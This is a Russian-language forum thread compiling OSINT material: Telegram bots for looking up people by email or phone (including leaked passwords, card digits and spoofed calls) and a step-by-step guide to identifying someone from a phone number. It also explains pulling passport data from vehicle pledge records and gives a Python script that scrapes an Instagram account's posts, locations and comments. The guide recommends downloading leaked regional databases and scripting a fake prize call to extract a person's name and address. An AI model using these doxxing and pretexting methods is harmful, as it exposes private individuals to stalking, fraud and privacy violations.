@UniversalSearchBot – поиск аккаунтов, привязанных к почте Yandex
@GetGmail_bot – поиск аккаунтов, привязанных к почте Gmail
@last4mailbot – поиск телефона по email
@mailExistsBot — найдет где привязан email адрес
@shi_ver_bot — показывает утекшие пароли email
Точечный OSINT по пробиву номера
(больше инфо смотри в "Автоматизированный OSINT")
@numberPhoneBot- пробив номера. кто звонил?
@Tpoisk_Bot - пробив номера от компании "Интернет-Розыск"
@clerkinfobot – поиск по номеру телефона и username Telegram.
@BuratinoEyeBot - пробив и бомбер в одном боте
@xinitbot - информация о базовых станциях, IMEI-номерах (не работает)
@get_kontakt_bot — пока не работает, раньше пробивал номер
Точечный OSINT по остальным соц сетям:
@InfoVkUser_bot – анализ друзей профиля ВК
@VKUserInfo_bot – выдает полную инфу о профиле ВК
@InstaBot – скачивает любые медиафайлы из Instagram.
@madeinttbot - скачивает видео с TikTok
@SaveYoutubeBot – скачивает ролики из YouTube
@getfb_bot – поиск страницы в Facebook по номеру телефона.
Полезные боты в Telegram на все случаи жизни:
@egrul_bot- проверка контрагента
@last4mailbot - показывает 4 цифры карты Сбербанка
@DrWebBot- проверяет файлы и ссылки на вирусы
@VirusTotalAV_bot - проверяет файлы и ссылки на вирусы
@ipscorebot - проверит IP
@etlgr_bot - подобие temp email
@SafeCallsBot - звонок с подменой номера
@Maksobot - озвучка синтезатором речи
@ChatSearchRobot – поиск чатов
@RoundDFBot - делает Deepfake video (качество так себе)
@EasyStrongPasswordBot - генератор сложных и запоминающихся паролей
@iptools_robot– умеет искать уязвимости на сайтах, собирать информацию про IP
и домены, искать субдомены и многое другое.
Автор не несёт ответственность за оказание или неоказание услуг ботами в Telegram для 3-их лиц. Вся информация о ботах является общедоступной и может использоваться только для ознакомления в образовательных целях.
Ищу сервис или инструмент, который поможет пробить имя человека по украинскому номеру
Очень интересно узнать ваши истории.
Может потом я что-то напишу из своих нахожденей может я расскажу
Как можно достать исходники [TROPHIES]
Spoiler
rusplt.ru
[/TROPHIES] и ещё что-то
Немного вступления:
Все сервисы для пробива есть в открытом доступе.
Но ведь дело не только в сервисах, но и в умение ими пользоваться.
Многие "пробивалы" именно так и находят информацию, зарабатывая на этом.
Прежде чем пробивать, подготовьте открытый блокнот, закройте все лишние
вкладки браузера, проще говоря, создайте себе комфортное рабочее место.
Для наглядности, использован рандомный номер телефона и вымышленные данные.
Поиск по номеру телефона:
И так, у нас есть одна исходная - номер телефона +79651236584
Номер телефона должен быть только в таком формате, меняя переменны 8 и +7,
никаких пробелов, скобочек, дефисов, точек.
Первые сервисы, которые мы будем использовать,
это https://yandex.ru/ и https://www.google.ru/
Да, именно поисковики, они могут дать множество информации:
записи вконтакте, одноклассниках, объявления на барахолках и других ресурсах.
Важные уточнения:
- Использовать нужно именно два поисковика (можно больше),
так как некоторые ссылки всплывают только в одном поисковике.
- В поиск вбивать два формата номера (+79651236584 и 89651236584),
так как поисковики ищут полное соответствие с запросом по номеру, а тот,
кого мы пробиваем, может указать как +7, так и 8
Следом, идем на второй ресурс - http://phonenumber.to/
Хороший сервис, который может выдать адрес и ФИО.
Большинство провайдеров его блочат, так что включайте vpn.
Тут мы так же ищем по номеру с разными префиксами (+7 и 8).
Так же отдельно еще зайдите вконтакте, воспользуйтесь поиском,
телефон вводите с разными префиксами. Обычно находит пару постов
со всяким шлаком, но попадаются и настоящие данные.
Сервис GetContact, сейчас популярен, сервис собирает номера телефонов
пользователей и данные их контактов для определения звонков с неизвестных
номеров и защиты от спама. Этими функциями почти никто не пользуется: вместо
этого пользователи массово скачивают Get Contact, чтобы узнать, как знакомые
записывают их в свои телефонные книжки.
Так же хорош для поиска, пробуйте.
Ничего не нашли? Идем дальше.
В своем телефоне в телефонную книжку записываем номер,
допустим, с именем "поиск", тут достаточно записать просто с префиксом +7.
Заходим поочередно в приложения: Viber, WhatsApp, Telegram, Instagram
Viber и WhatsApp - тут можно увидеть фотографию,
которая стоит в профиле, если номер там зарегистрирован. Её мы сохраняем.
Telegram - заходим в контакты в приложение, ищем контакт "поиск", заходим в
профиль, копируем Username, который начинается с @, сохраняем его, удаляем
контакт с телефона и с самого телеграма, теперь ищем по самому Username, и тут
нам уже покажет что у него записано в полях имя и фамилия. Если не удалить
контакт, то он будет показывать у вас "поиск".
С телеграма так же можно вытащить фотографию, если она там есть.
Instagram - заходите в ваш профиль-параметры-контакты.
Тут может показать профиль, который зарегистрирован на номер.
В профиле же можно найти ссылку на vk и другие соц.сети, дополнительный
номер, фамилию и имя, ну и конечно же фотографии.
Номер мы везде пробили, данные которые мы могли найти:
фотографии, никнейм, прямые ссылки, ФИО, дополнительные номера и т.д.
Дальше мы будем разбирать поиск по данным, которые получили.
Фотографии:
Тут все просто. Если фото из WhatsApp, Instagam, мы их не сохраним.
Просто делаем скриншот экрана и затем ОБЯЗАТЕЛЬНО обрезаем все лишнее,
оставляя только фотографию.
Идем снова на https://yandex.ru/images/ и https://www.google.ru/imghp
и использыем поиск по фотографии. Тут можем найти прямые ссылки на соц.сети и
ФИО.
Второй ресурс - https://findface.ru/ Все думаю уже о нем наслышаны, сейчас
требует авторизацию и стоит ограничение на поиск. Думаю, прекрасно с этим
справитесь, ничего тут сложного нет.
Так же можете найти соц.сети.
Скажу так, поиск по фото имеет минимальный шанс найти
инфу, но все же шанс есть, поэтому всегда использую при поиске.
ФИО:
ФИО так же можно вбить в поисковики(в форматах ФИО и ФИО "город"),
инфа иногда находится. Если человек предприниматель, найдет его организации,
затем по организации мы уже ищем дополнительные контакты, такие как: сайт
организации, группы в соц.сетях и т.д.
Если phonenumber.to не смог найти по телефону, попробуйте найти по ФИО.
Если имя с фамилией редкие, то помогает простой поиск вконтакте, примерный
регион всегда показывает в гугле по номеру телефона. Если слишком много
совпадений, но знаете город, идите в группу "Типичный "город"" и попробуйте
воспользоваться поиском по участникам. Это помогает, когда вы знаете как
примерно выглядит человек, например, если мы вытащили фото с ресурсов выше.
Так же можете воспользоваться сервисом https://yandex.ru/people
Ссылки на соц.сети и другие сайты:
Не редко выпадают ссылки на сайты или соц.сети, но бывают такие ситуации, что
страница уже удалена (например, вконтакте) или объявления снято с продажи (на
барахолках), тогда мы используем замечательный сервис https://archive.org/
Он вам покажет сохраненные копии страниц по ссылке, которую нашли.
Например, страница вконтакте была удалена 5 дней назад, а в веб-архиве есть
сохраненные копии страницы за прошлый месяц. Так можно делать с любым сайтом.
Никнейм:
Например, мы нашли никнейм в телеграме.
Его так же можно вбить в поисковики, вконтакте,
может где-то оставлял ссылку, поэтому велика вероятность найти.
Но в первую очередь используйте превосходный сервис <http://login.stop-
list.info/>
Он генерирует ссылки на все соц.сети с никнеймом, который указали, посылает
запрос в каждую соц.сеть и тут же показывает вам результат в виде окна со
страницей.
Тут сразу видно, error или есть такая страница.
И чекните снова https://yandex.ru/people
Дополнительно:
В крайних случаях, когда нигде инфы найти не могу,
но пробить нужно обязательно, скачиваю различные базы.
Они не так актуальны, но иногда помогают. Например мне нужно найти
человека с моего города. Я скачиваю базу ФОМС, ГИБДД моего города и т.д.
они в основном в кроносе, поиск удобный. Пусть инфа может быть
не актуальной, но мы уже будем знать старые данные, от которых легче
отталкиваться.
В еще более крайних случаях можно использовать СИ.
Придумайте историю, которая требует ФИО назвать, позвоните
по номеру и добудьте эти данные любой ценой.
Например:
"Доброго времени суток. Портал "Наебка.да"
проводил рандомный розыгрыш по номерам, Вы оказались в числе победителей.
Не спешите бросать трубку, платить ни за что не нужно, доставка абсолютно
бесплатна,
от вас требуется всего лишь ФИО и адрес. А выиграли вы "говно в коробке"
Давайте я запишу данные и отправлю вам подарок"
Таким методом я пользовался в личных целях, он действует, и это главное.
Заключение:
На мой взгляд, я собрал самые актуальные сервисы, которые действительно
помогают найти информацию. Другими сервисами пользовался, от них выхлоп почти
нулевой.
Если человек активен в интернете, можно собрать неплохое "досье".
При работе используйте блокнот, записывайте
всю информацию, любую мелочь, которую найдете, это очень сильно помогает.
А так же узнаем ФИО и паспортные данные по номеру автомобиля если он взят в
кредит.
Без регистрации и СМС.
HOW-to:
Spoiler: Скрин
Если у физ. лица есть кредит с залогом, то сайт выдает документ «Уведомление о возникновении залога», содержащее помимо прочего ФИО, дату рождения, паспортные данные залогодателя.
Spoiler: Скрин
В случае с поиском информации о владельце по номеру автомобиля алгоритм не сильно сложнее:
Spoiler: Скрин
В случае, если авто залоговое, мы получим избыточную информацию о владельце, а так же дату окончания кредита.
habr.com/
Тема для кейсов, инструментов по различным блокчейнам. В основном Bitcoin.
<https://medium.com/@gags.gk/investigating-fraudulent-bitcoin-transactions-
using-osint-90d861dc9e17> - Investigating Fraudulent Bitcoin Transactions
using OSINT
[http://www.automatingosint.com/blog...oin-with-python-blockexplorer-and-
webhose-io/](http://www.automatingosint.com/blog/2017/09/follow-the-bitcoin-
with-python-blockexplorer-and-webhose-io/) - Follow the Bitcoin With
Python, BlockExplorer and Webhose.io
[https://www.bellingcat.com/resource...ns-with-blockchain-a-guide-featuring-
mueller/](https://www.bellingcat.com/resources/how-tos/2019/02/01/tracking-
illicit-transactions-with-blockchain-a-guide-featuring-mueller/) - Как
отследить противозаконные сделки при помощи блокчейна на примере
обвинительного заключения Мюллера (Bellingcat).
[https://medium.com/@benjamindbrown/...mers-finances-through-
blockchain-e9c52fb6127d](https://medium.com/@benjamindbrown/tracing-syrian-
cell-kidnappers-scammers-finances-through-blockchain-e9c52fb6127d) -
**Tracing a Jihadi cell, kidnappers and a scammer using the blockchain — an
open source investigation
Блог WizSec, занимаются делом Mt.Gox: https://blog.wizsec.jp/
**
Получив в свое распоряжение громадное количество информации в виде глобальной сети, многие люди так и не научились извлекать из интернета нужные им данные. В руках у каждого подростка мощный смартфон, и казалось бы — набери правильный запрос в Google — и ты научишься всему, чему захочешь, узнаешь всё, что захочешь знать. Но в большинстве случаев весь поисковый навык у обывателя ограничвается фразами «смотреть порнуху» и «скачать танки».
Положение дел может поправить популяризация среди молодежи такого направления деятельности как OSINT. Данный термин означает поиск требуемой информации по открытым источникам, и чем то перекликается с хакингом, однако всё остается в рамках закона, и не требует технических скиллов. Тем не менее, OSINT может принести массу пользы, если его использовать правильно.
Далее я приведу список некоторых полезных онлайн сервисов для OSINT:
————————
Поиск людей в социальных сетях:
http://people.yandex.ru
https://vk.com/people
https://www.facebook.com/friends/requests/
https://twitter.com/search-advanced
http://pipl.com
https://www.spokeo.com/
Просмотр скрытых друзей VK и общих друзей между двумя профилями
https://220vk.com/
Поиск инфы о записях ВК по ID пользователя (заменить в адресе ID на номер ID
юзера)
https://vk.com/feed?obj=ID&q=§ion=mentions
————————
Поиск где еще встречается фото (полезно при поиске других социальных аккаунтов
объекта, либо первоисточника фотографии)
https://images.google.com/
https://yandex.ru/images/
https://www.tineye.com/
————————
Извлечение EXIF информации из фотографии (может содержать географические
координаты места съемки):
http://metapicz.com/#landing
http://linkstore.ru/exif/
http://exif.regex.info/exif.cgi
http://imgops.com/
————————
Поиск информации по сотовому телефону
Прежде всего установите на левый телефон с пустой контактной книгой,
приложения GetContact и Numbuster
https://play.google.com/store/apps/details?id=app.source.getcontact&hl=ru
https://play.google.com/store/apps/details?id=com.numbuster.android&hl=ru
Они позволят определить как данный номер записан в чужих телефонных книгах.
Также установите на телефон приложения Viber, Telegram, VK, и WhatsApp.
Внесите искомый номер в контакты на телефоне, и импортируете контакты в
уствновленные приложения. Это позволит найти аккаунты человека, если его
сотовый использовался там для регистрации.
————————
Поиск по домашнему телефону, ФИО и городу или адресу проживания
http://nomerorg.me
http://spra.vkaru.net
————————
Всё о владельце машины по госномеру, телефону или vin.
https://avinfo.co/
https://гибдд.рф/check/auto
————————
Информация об ИП и организациях в том числе по ФИО предпринимателя
https://egrul.nalog.ru/index.html
————————
Получить выписку из ЕГРН об основных характеристиках и зарегистрированных
правах на объект недвижимости
https://rosreestr.ru/wps/portal/p/cc_present/EGRN_1
————————
Узнать город по IP
https://www.maxmind.com/ru/geoip-demo
————————
Естественно, это далеко не все сайты, помогающие найти ту или иную информацию.
Осинтеры составляют целые подборки таких сервисов, они часто меняются, и
пополняются новыми инструментами.
https://github.com/jivoi/awesome-osint
https://osintframework.com
https://github.com/netstalking-core/netstalking-osint
https://github.com/automatingosint/osint_public
https://github.com/jmortega/osint_tools_security_auditing
————————
Помимо онлайн-сервисов существуют программы для компьютеров и смартфонов,
упрощающие процесс поисков нужной вам информации.
https://github.com/DataSploit/datasploit
https://www.spiderfoot.net/download/
https://github.com/intrigueio/intrigue-core
https://www.spiderfoot.net/download/
https://www.paterva.com/web7/buy/maltego-clients/maltego-ce.php
https://gitlab.com/kennbroorg/iKy/blob/master/README.en.md
https://github.com/xillwillx/skiptracer
https://github.com/altjx/ipwn/tree/master/pyfoca
https://github.com/Te-k/harpoon
https://github.com/jofpin/trape
http://www.geocreepy.com
Всем привет! Может кто подскажет а может даже поделится так сказать "дорожной картой" инфо атаки на персону, компанию. Или противодействию подобных атак.
Буду признателен за любую информацию.
Предлагаю скидывать инструменты, методы, тактики.
Хотя, в последнее время я не занимаюсь этим, но как говорят, талант не
пропьёшь)
История
Click to expand...
Click to expand...
Замена шодану
Click to expand...
Click to expand...
Поиск людишек по соц сетям итд
Click to expand...
И ещё совсем недавно узнал о таком, я его не тестил
Click to expand...
.
Это всё чем я пользуюсь , ещё гугл и бинг
Хороший ресурс иметь под руку как OSINT аналист
https:__//osintframework.com/
Кому интересно как обнаруживают БД в свободном доступе. Начало с 7й минуты.
План статьи
Введение
Еще с 1941 года Американское правительство обширно использовало OSINT. Уже в
1947 году Шерман Кент, аналитик ЦРУ, сообщил, что около 80% информации,
которая используется политиками для принятия решений, берется из открытых
источников.
([источник](https://www.researchgate.net/publication/326652444_A_Real-
Time_Social_Media_Monitoring_System_as_an_Open_Source_Intelligence_Osint_Platform_for_Early_Warning_in_Crisis_Situations),
с. 428, конец 2 параграфа)
Поэтому, в наше время, грамотный подход к OSINT’у позволит раздобыть ценную информацию из открытых данных, особенно это актуально в эру масштабного использование соцсетей. Как правило, современные аккаунты соцсетей имеют большое количество различных данных, на анализ которых требуется большая часть времени.
Чтобы оптимизировать поиск данных и увеличить скорость их нахождения, в данной статье я детально расскажу, как можно написать свой собственный скрипт для анализа данных аккаунтов различных соцсетей.
Реализовать скрипт можно двумя способами: используя API (более простой и удобный путь) и написание без API, используя только запросы (долгий и трудоемкий процесс).
Каждый перечисленный способ имеет свои недостатки и преимущества, но обо всем по порядку.
Термины
В этом пункте вы можете ознакомиться со всеми непонятными терминами, которые
используются в статье.
Подготовительная часть
Для написания скриптов я буду использовать Python, так как он удобен при
работе с запросами, обработке ответов от серверов, и быстро справляется с
массивами данных. Если конкретнее, то я буду использовать Python версии 3.7.3.
**Создания скрипта без API
Декомпиляция сетевого трафика**
Скрипт мы будем писать под Web версию Инстаграма, и наш скрипт не будет требовать ни единой информации от юзера, кроме нужного никнейма для скана.
Начать стоит с того, что, не имея под руками ключей для использования API, выкручиваться нужно только декомпиляцией трафика. Проанализировав GET запросы, я заметил, что для подзагрузки фотографий, запрос отправляется на https://www.instagram.com/graphql/query/:
Рисунок 1: разбор GET запроса
Перейдя по ссылке, я понял, что при валидном запросе, сервер выдаст ответ в формате json:
Рисунок 2: сервер ответил на запрос “Instagram.com/graphql/query ” ошибкой
Использовав один из ранних GET запросов:
Code:Copy to clipboard
https://www.instagram.com/graphql/query/?query_hash=f2405b236d85e8296cf30347c9f08c2a&variables=%7B%22id%22%3A%2224025320%22%2C%22first%22%3A12%2C%22after%22%3A%22QVFBakZHYzBMN1pNeld5SWhJTUpNbkZzSGhoVWdUMk5WYjBQV0E1WmFyNmNqTDM2bmlmS3lhdWNzN21mOVJVR3RnUDQzRGxOVG83VHRPakpvSm5WbUhMYw%3D%3D%22%7D
я получил такой ответ:
Рисунок 3: ответ сервера на GET запрос о подзагрузке доп. фото
Где под номером подразумевается node, дерево, которое вмещает в себе всю информацию о посте (будто видео или фото).
Прогнав 2 подобных запроса через URL Decoder, я получил следующее:
Code:Copy to clipboard
https://www.instagram.com/graphql/query/?query_hash=f2405b236d85e8296cf30347c9f08c2a&variables={"id":"24025320","first":12,"after":"QVFBakZHYzBMN1pNeld5SWhJTUpNbkZzSGhoVWdUMk5WYjBQV0E1WmFyNmNqTDM2bmlmS3lhdWNzN21mOVJVR3RnUDQzRGxOVG83VHRPakpvSm5WbUhMYw=="}
https://www.instagram.com/graphql/query/?query_hash=f2405b236d85e8296cf30347c9f08c2a&variables={"id":"24025320","first":12,"after":"QVFEV2NTam5oekdON2hjRlluLXZHLXhORnpRczdNQmV5LTB4ZTFjM2E4NnZIM25QRHdQOGg2Q2Zrc1BtOXp3VjVxdHNMR2FoWGVMemJMS2VlWHlJX0dLcA=="}
Из этого стало понятно, что параметр id - вероятнее всего обозначает id страницы, для которой нужна подзагрузка. Параметр first – обозначает количество до загружаемых фото, но максимальное количество фотографий, которое можно дозагрузить – 50 штук.
В параметре after передается строка, которая существует при условии True у параметра has_next_page:
_Рисунок 4: если “has_next_page”:False, то значения end_cursor нету
Рисунок 5: если “has_next_page”rue, то значения end_cursor есть_
Но остается вопрос: “Где берется самый первый параметр after?”
Покопавшись в .html странице Инстаграма, я заметил, что в строках 277 и 274 данные записаны в похожем стиле json:
Рисунок 6[/I]
Скопировав строки и прогнав их через JSON Formater, я получил с одной строки ~2400 строк, а с другой ~250, и не содержит в себе полезной информации.
Информация об аккаунте содержится в подкаталоге graphql:
Рисунок 7: сопоставление данных со строки 274 с данными на странице.
Мне показалось странным называть так подкаталог, и поэтому я решил обратиться к поисковикам.
Самой первой страницей, которую выдал Google, был вопрос на [satckoverflow.com](https://stackoverflow.com/questions/45787021/how-to-use- instagram-graphql). Из ответа я узнал, чтобы получить JSON ответ о любой странице, нужно в конце добавить значение ?__a=1. И это сработало!
Вместо того, чтобы копаться в одной строке в структуре страницы, мы можем просто получить json ответ о любой странице:
Code:Copy to clipboard
Instagram.com/instagram/?__a=1
Рисунок 8: Сравнение ответа сервера, и строки 274
Перейдем теперь к параметру query_hash
. Так как
f2405b236d85e8296cf30347c9f08c2a
сервер принимает, и не выдает ошибок,
использовать во всех дозагрузках будем именно его.
Я все же решил разобраться, откуда он берется для GET запросов дозагрузки.
Генератор query_hash
лежит в файле ProfilePageContainer.js/
. Но для
каждой страницы в Инастаграме существует свой файл:
Рисунок 9
В самом файле хеш лежит в параметре queryId, но, как правило, в этом файле как минимум 4 таких параметров с разными хешами:
Рисунок 10: 4 разных queryId в .js файле
Но, именно после profilePosts.byUserId.get
идет нужный queryId
:
Рисунок 11
И так, имея всю нужную информацию под рукой, можно перейти к следующему пункту.
Создание приблизительной схемы будущего скрипта
Рисунок 12: приблизительная блок-схема
Реализация скрипта
Для создания скрипта, который будет выполнять действия на схеме, потребуется 5
библиотек:
Тестирование и объяснение отдельных функции
Первая функция parser() принимает введенный никнейм, и отправляет его в
фукнцию main()
Python:Copy to clipboard
def parser():
parser = argparse.ArgumentParser(prog='OSINT Inst')
parser.add_argument("-n", "--nickname", help="Nickname?", dest="nickname")
args = vars(parser.parse_args())
main(args["nickname"])
В функции main()
запрашивается страница с указанным никнеймом, и парсится
ответ, который пришел в json формате. Если страница существует, создается
папка Instagram, где будит хранится вся информация об указанном аккаунте.
Парсится так же и отдельная часть, которая в дальнейшем отправляется в функцию
parse_page()
Python:Copy to clipboard
def main(nickname):
url = "https://www.instagram.com/"+nickname
response = requests.get(url + "?__a=1")
if "Page Not Found" in response.text:
print("Page Not Found")
exit()
todos = json.loads(response.text)
os.mkdir("Instagram")
parse_page(todos)
photoes(todos["graphql"]["user"])
В функции parse_page()
принимается словарь из различных значений, и
создаются переменные для дальнейшей их записи в файл “info.txt” который, как
уже было написано раньше, сохраняется в папке Instagram.
Python:Copy to clipboard
def parse_page(todos):
print("Getting info about profile...")
follow_inst = str(todos["graphql"]["user"]["edge_follow"]["count"])
followed_by_inst = str(todos["graphql"]["user"]["edge_followed_by"]["count"])
content_inst = str(todos["graphql"]["user"]["edge_owner_to_timeline_media"]["count"])
biography = todos["graphql"]["user"]["biography"]
name = todos["graphql"]["user"]["full_name"]
username = todos["graphql"]["user"]["username"]
verified = str(todos["graphql"]["user"]["is_verified"])
fb = str(todos["graphql"]["user"]["connected_fb_page"])
business = str(todos["graphql"]["user"]["is_business_account"])
try:
link = "\nLink: "+ todos["graphql"]["user"]["external_link"]
except:
link = ''
file = open("Instagram/info.txt", "w", encoding="utf-8")
info = "Name: "+name+"\nUsername: "+username+"\nBiography: "+biography+"\n\nVerified: "+verified+"\nFollow: "+follow_inst+"\nFollowed: "+\
followed_by_inst+"\nNumber of posts: "+content_inst+link+"\nBusiness account: "+business+\
'\nConnected to facebook: '+fb
file.write(info)
file.close()
Как только благополучно заканчивается функция parse_page()
, в функция
main()
запускает следующею, а именно photoes()
. Данная функция вмещает
себе функции, которые отвечают за сбор информации о каждой фотографии в
аккаунте, и их загрузке. Подробнее об этом в следующей части.
ФОТО
Стоит начать с того, что при загрузке страницы в Инстаграме, загружаются уже
12 фотографий, и это можно заметить в ответе на запрос
Instagram.com/{nickname}/?__a=1
, а именно в подзаголовке edges
:
Рисунок 13: уже загруженные 12 фотографий
Так же в подзаголовке page_info
есть нужный нам параметр end_cursor
.
Поэтому, переменная media
вмещает в себе загруженные посты, checker
содержит в себе параметр has_next_page
а idprofile_inst
– Id аккаунта в
Инстаграме.
Получив данные, функция photoes(), обратывает их, и дальше вызывает функцию
Get_req_photo()
Python:Copy to clipboard
def photoes(json_media):
media = json_media["edge_owner_to_timeline_media"]["edges"]
checker = json_media["edge_owner_to_timeline_media"]["page_info"]["has_next_page"]
idprofile_inst = json_media["id"]
get_req_photo('', media, checker, json_media, idprofile_inst)
Функция get_req_photo()
создает запросы о дозагрузке фотографии, если
has_next_page
имеет значeние True
, то есть существует еще страница с
фотографиями и её нужно дозагрузить.
Вначале своей работы, переменная media сразу же добавляется в переменную
media_to_parse
. Эта переменная в конце работы скрипта будет содержать все
посты, которые потом будут обрабатываться.
Python:Copy to clipboard
def get_req_photo(media_to_parse, media, checker, json_media, idprofile_inst):
media_to_parse += str(media)
if checker:
end_cursor = json_media["edge_owner_to_timeline_media"]["page_info"]["end_cursor"]
data_for_get_req = 'https://www.instagram.com/graphql/query/?query_hash=f2405b236d85e8296cf30347c9f08c2a' \
'&variables=%7B%22id%22%3A%22' + idprofile_inst + \
'%22%2C%22first%22%3A50%2C%22after%22%3A%22' + end_cursor.split("==")[0] + '%3D%3D%22%7D'
gett = requests.get(data_for_get_req)
json_media = json.loads(gett.text)
checker = json_media["data"]["user"]["edge_owner_to_timeline_media"]["page_info"]["has_next_page"]
media = json_media["data"]["user"]["edge_owner_to_timeline_media"]["edges"]
get_req_photo(media_to_parse, media, checker, json_media["data"]["user"], idprofile_inst)
else:
print("Got ", len(str(media_to_parse).split("'shortcode': '")), " post(s)")
for i in range(1, len(str(media_to_parse).split("'shortcode': '"))):
link_to_page = str(media_to_parse).split("'shortcode': '")[i].split("',")[0]
req = requests.get("https://instagram.com/p/" + link_to_page + "/?__a=1")
json_page = json.loads(req.text)
parse_media(json_page["graphql"]["shortcode_media"], i)
print("Done")
И так, если параметр has_next_page
имеет значение True, то скрипт будет
создавать запросы и добавлять посты до тех пор, пока параметр has_next_page
не будет иметь значения False, то есть больше постов нет. После парсинга
ответа от сервера, создаются более свежие переменные, которые имеют новую
информацию. Дальше они передаются опять этой же функции, далее по кругу. Такие
функции называются рекурсивными. Несмотря на то, что многие профессионалы
рекомендуют их не использовать, в этом варианте, ошибки никакой не будет, ведь
вызов той самой функции, является её последним этапом, и из-за этого не
правильной работы в скрипте можно избежать.
После того, как все посты были загружены, создается цикл, который будет
поочерёдно отправлять каждый пост в функцию parse_media()
В Инстаграме существует 3 вида постов: фотография, видео, коллекция. Из-за
этого в функции parse_media()
существует отдельно загрузка для каждого вида
постов. Я решил загружать только фотографии, из-за того, что видео будут
существенно тормозить работу скрипта. Было решено создавать файл с названием
“video.txt”, где будет указываться ссылка на пост с видео.
Так же, скрипт загружает фотографии самого высокого качества. Ссылки на
фотографии лежат в параметре display_resources
Рисунок 14: подкаталог с ссылками на фото различного качества
Функция создает глобальную папку Instagram, . Из информации, берется: количество лайков, текст поста, локация, отмеченные профили (теги), комментарии и ссылка на пост; для видео: количество просмотров; для фотографии: captions.
Captions – это догадка искусственного интеллекта, что может содержать фотография. К примеру:
Рисунок 15: фото, и описание, созданное ИИ
Так же, в корневую папку, будут сохраняться еще отдельные файлы:
Python:Copy to clipboard
def parse_media(json_page, m):
view_count = ''
os.mkdir("Instagram/post " + str(m))
captions = '\nCaption(s): '
print("Downloading post " + str(m))
if json_page["__typename"] == "GraphVideo":
view_count = str("\nView count = " + str(json_page["video_view_count"]))
out = open("Instagram/post " + str(m) + "/video.txt", "w")
out.write(str("https://instagram.com/p/"+json_page["shortcode"]))
out.close()
if json_page["__typename"] == "GraphImage":
photo = str(json_page["display_resources"][-1]["src"])
p = requests.get(photo)
out = open("Instagram/post " + str(m) + "/img" + str(m) + ".jpg", "wb")
out.write(p.content)
out.close()
captions = "\n"+json_page["accessibility_caption"]
if json_page["__typename"] == "GraphSidecar":
for i in range(len(json_page["edge_sidecar_to_children"]["edges"])):
photoes = json_page["edge_sidecar_to_children"]["edges"][i]["node"]["display_resources"][-1]["src"]
p = requests.get(photoes)
out = open("Instagram/post "+str(m)+"/img"+str(i)+".jpg", "wb")
out.write(p.content)
out.close()
try:
captions += "\nphoto №"+str(i)+"-"+ str(json_page["edge_sidecar_to_children"]["edges"][i]
["node"]["accessibility_caption"])+"\n"
except:
view_count = str("\nView count = " + str(json_page["edge_sidecar_to_children"]["edges"][i]
["node"]["video_view_count"]))
out = open("Instagram/post " + str(m) + "/video.txt", "w")
out.write(str("https://instagram.com/p/" + json_page["shortcode"]))
out.close()
likes = "\nlikes: " + str(json_page["edge_media_preview_like"]["count"])+"\n"
link = "Link - "+"instagram.com/p/"+json_page["shortcode"]+"\n"
location = json_page["location"]
if location is not None:
with open("Instagram/all_locations.txt", "a", encoding="utf-8") as file:
file.write("post "+str(m)+"\n"+str(location)+"\n")
else:
location = ''
pass
if json_page["edge_media_to_tagged_user"]["edges"] == []:
tagged_user = ''
else:
tagged = str(json_page["edge_media_to_tagged_user"]).split("node")
tagged_user = '\nTagged user(s): '
for i in range(1, len(tagged)):
tagged_user += "@"+str(json_page["edge_media_to_tagged_user"]).split("username': '")[i].split("'}")[0]+\
" ("+str(json_page["edge_media_to_tagged_user"]).split("full_name': '")[i].split("', ")[0]+")\n"
with open("Instagram/all_tagged.txt", "a", encoding="utf-8") as file:
file.write(str("post " + str(m) + ":" + tagged_user + "\n"))
file = open("Instagram/post "+str(m)+"/info.txt", "w", encoding="utf-8")
try:
text = "text: '"+str(json_page["edge_media_to_caption"]["edges"][0]["node"]["text"])+"'\n"
except:
text = "text: None\n"
all_information = str(text+likes+tagged_user+"\nLocation: "+str(location)+captions+view_count+"\n"+link)
file.write(all_information)
file.close()
try:
checker_for_comment = json_page["edge_media_to_parent_comment"]["count"]
except:
checker_for_comment = json_page["edge_media_to_comment"]["count"]
if checker_for_comment != 0:
comm(json_page, m)
else:
pass
Комментарии
Парсинг комментариев происходит подобным образом.
При загрузке фотографии по ссылке Instagram.com/p/xxxxxxxxxxx
, загружаются
так же и часть комментариев (как это было с профилем и постами):
Рисунок 16: загруженные комментарии фотографии
И так, существует функция comm()
которая вызывается каждый раз из функции
parse_media()
. В функции создаются первые переменные, которые в дальнейшем
используются в get_req_com()
:
Python:Copy to clipboard
def comm(json_page, m):
list_of_comments = ''
try:
try:
comments = json_page["edge_media_to_parent_comment"]["edges"]
page_info = json_page["edge_media_to_parent_comment"]["page_info"]
except KeyError:
comments = json_page["edge_media_to_comment"]["edges"]
page_info = json_page["edge_media_to_comment"]["page_info"]
except Exception as e:
print("\n\n", json_page,"\nError:", e)
exit()
get_req_com(json_page["shortcode"], comments, page_info, list_of_comments, m)
В функции get_req_com()
все загруженные комментарии с постом сохраняются в
переменную list_of_comm
. Только в подкаталоге page_info
содержится
информация о существовании следующих комментариев. Если параметр
has_next_page
равен True
, то создается запрос о подзагрузке 49
комментариев (да, почему-то лимит постов – 50, но лимит комментариев - 49),
потом создаются свежие переменные, и опять отправляются в ту же функцию.
Загрузив информацию о посте, и скачав фотографию, новый пост не начнет
обрабатываться, пока has_next_page
не будет равен False
:
Рисунок 17
После того, как has_next_page
достиг значения False
, все собранные
комментарии с поста отправляются в функцию parse_comm()
, где каждый коммент
парсится, и собирается в единую переменную list, и после этого, функция
возвращает отредактированный список комментариев в переменную comments.
Comments
записывается в файл comments.txt определенного поста и в файл
all_comments.txt .
Так же при загрузке комментариев иногда проскальзывает ошибка ‘rate limiting’. Эта ошибка связанна с большим количеством запросов на подзагрузку дополнительных комментариев. И решением является «простой» кода 8 минут.
Как только работа скрипта закончена, мы получаем такой результат:
Рисунок 18: демонстрация сохраненных данных
Создание скрипта с использованием API
Этот скрипт мы будет писать под Twitter.
Получение доступа к api является самым сложным пунктом. И так, что бы начать пользоваться API Twitter’a, мы должны:
Рисунок 19: выбор категории будущего приложения
Рисунок 20: заявление на выдачу API отправлено
Получив на свою почту подобное письмо:
Рисунок 21: письмо от команды Твиттера на одобрение приложения
Можно приступать к получению ключей.
Переходим в Apps:
Рисунок 22
Затем в Details:
Рисунок 23
Во вкладке Keys and tokens, будут лежать нужные нам ключи:
Рисунок 24
Приступаем к созданию схемы
Создание приблизительной схемы будущего скрипта
Рисунок 25: приблизительная блок-схема
Реализация скрипта
В этом скрипте будем использовать дополнительную библиотеку TwitterAPI
Устанавливается она, как и все доп. библиотеки, следующей командой:
Code:Copy to clipboard
Pip install TwitterAPI
